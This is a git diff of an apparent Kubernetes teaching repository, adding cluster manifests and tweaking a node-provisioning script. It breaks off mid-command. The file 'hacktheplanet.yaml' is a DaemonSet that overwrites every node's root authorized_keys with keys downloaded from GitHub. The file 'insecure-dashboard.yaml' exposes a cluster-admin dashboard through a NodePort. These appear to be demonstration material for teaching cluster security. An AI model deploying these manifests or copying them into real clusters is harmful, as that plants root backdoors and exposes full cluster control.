||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
220
k8s/insecure-dashboard.yaml
Normal file
@@ -0,0 +1,220 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# Configuration to deploy release version of the Dashboard UI compatible with
|
||||
# Kubernetes 1.8.
|
||||
#
|
||||
# Example usage: kubectl create -f <this_file>
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1beta2
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
110
k8s/local-path-storage.yaml
Normal file
@@ -0,0 +1,110 @@
|
||||
# This is a local copy of:
|
||||
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: local-path-storage
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: local-path-provisioner-role
|
||||
namespace: local-path-storage
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes", "persistentvolumeclaims"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints", "persistentvolumes", "pods"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["create", "patch"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: local-path-provisioner-bind
|
||||
namespace: local-path-storage
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: local-path-provisioner-role
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: apps/v1beta2
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: local-path-provisioner
|
||||
namespace: local-path-storage
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: local-path-provisioner
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: local-path-provisioner
|
||||
spec:
|
||||
serviceAccountName: local-path-provisioner-service-account
|
||||
containers:
|
||||
- name: local-path-provisioner
|
||||
image: rancher/local-path-provisioner:v0.0.8
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- local-path-provisioner
|
||||
- --debug
|
||||
- start
|
||||
- --config
|
||||
- /etc/config/config.json
|
||||
volumeMounts:
|
||||
- name: config-volume
|
||||
mountPath: /etc/config/
|
||||
env:
|
||||
- name: POD_NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
volumes:
|
||||
- name: config-volume
|
||||
configMap:
|
||||
name: local-path-config
|
||||
---
|
||||
apiVersion: storage.k8s.io/v1
|
||||
kind: StorageClass
|
||||
metadata:
|
||||
name: local-path
|
||||
provisioner: rancher.io/local-path
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
reclaimPolicy: Delete
|
||||
---
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: local-path-config
|
||||
namespace: local-path-storage
|
||||
data:
|
||||
config.json: |-
|
||||
{
|
||||
"nodePathMap":[
|
||||
{
|
||||
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
|
||||
"paths":["/opt/local-path-provisioner"]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
138
k8s/metrics-server.yaml
Normal file
@@ -0,0 +1,138 @@
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: system:aggregated-metrics-reader
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rules:
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: metrics-server:system:auth-delegator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:auth-delegator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: metrics-server-auth-reader
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: extension-apiserver-authentication-reader
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apiregistration.k8s.io/v1beta1
|
||||
kind: APIService
|
||||
metadata:
|
||||
name: v1beta1.metrics.k8s.io
|
||||
spec:
|
||||
service:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
group: metrics.k8s.io
|
||||
version: v1beta1
|
||||
insecureSkipTLSVerify: true
|
||||
groupPriorityMinimum: 100
|
||||
versionPriority: 100
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: metrics-server
|
||||
template:
|
||||
metadata:
|
||||
name: metrics-server
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
serviceAccountName: metrics-server
|
||||
volumes:
|
||||
# mount in tmp so we can safely use from-scratch images and/or read-only containers
|
||||
- name: tmp-dir
|
||||
emptyDir: {}
|
||||
containers:
|
||||
- name: metrics-server
|
||||
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
|
||||
imagePullPolicy: Always
|
||||
volumeMounts:
|
||||
- name: tmp-dir
|
||||
mountPath: /tmp
|
||||
args:
|
||||
- --kubelet-preferred-address-types=InternalIP
|
||||
- --kubelet-insecure-tls
|
||||
- --metric-resolution=5s
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
kubernetes.io/name: "Metrics-server"
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: metrics-server
|
||||
ports:
|
||||
- port: 443
|
||||
protocol: TCP
|
||||
targetPort: 443
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
- nodes/stats
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:metrics-server
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
95
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,95 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ pods ]
|
||||
verbs: [ get, list ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: orange
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
33
k8s/users:jean.doe.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ users:jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: users:jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
70
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
@@ -2,7 +2,7 @@ export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
@@ -74,10 +74,10 @@ _cmd_deploy() {
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
@@ -86,11 +86,11 @@ _cmd_deploy() {
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
# On node1, create and deploy TLS certs using Docker Machine
|
||||
# On the first node, create and deploy TLS certs using Docker Machine
|
||||
# (Currently disabled.)
|
||||
true || pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
grep ' node' /etc/hosts |
|
||||
if i_am_first_node; then
|
||||
grep '[0-9]\$' /etc/hosts |
|
||||
xargs -n2 sudo -H -u docker \
|
||||
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
|
||||
fi"
|
||||
@@ -103,11 +103,62 @@ _cmd_deploy() {
|
||||
info "$0 cards $TAG"
|
||||
}
|
||||
|
||||
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
|
||||
_cmd_disabledocker() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "sudo systemctl disable docker.service"
|
||||
pssh "sudo systemctl disable docker.socket"
|
||||
pssh "sudo systemctl stop docker"
|
||||
}
|
||||
|
||||
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
|
||||
_cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
cd /usr/local/bin
|
||||
if ! [ -x etcd ]; then
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
|
||||
fi
|
||||
if ! [ -x hyperkube ]; then
|
||||
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
|
||||
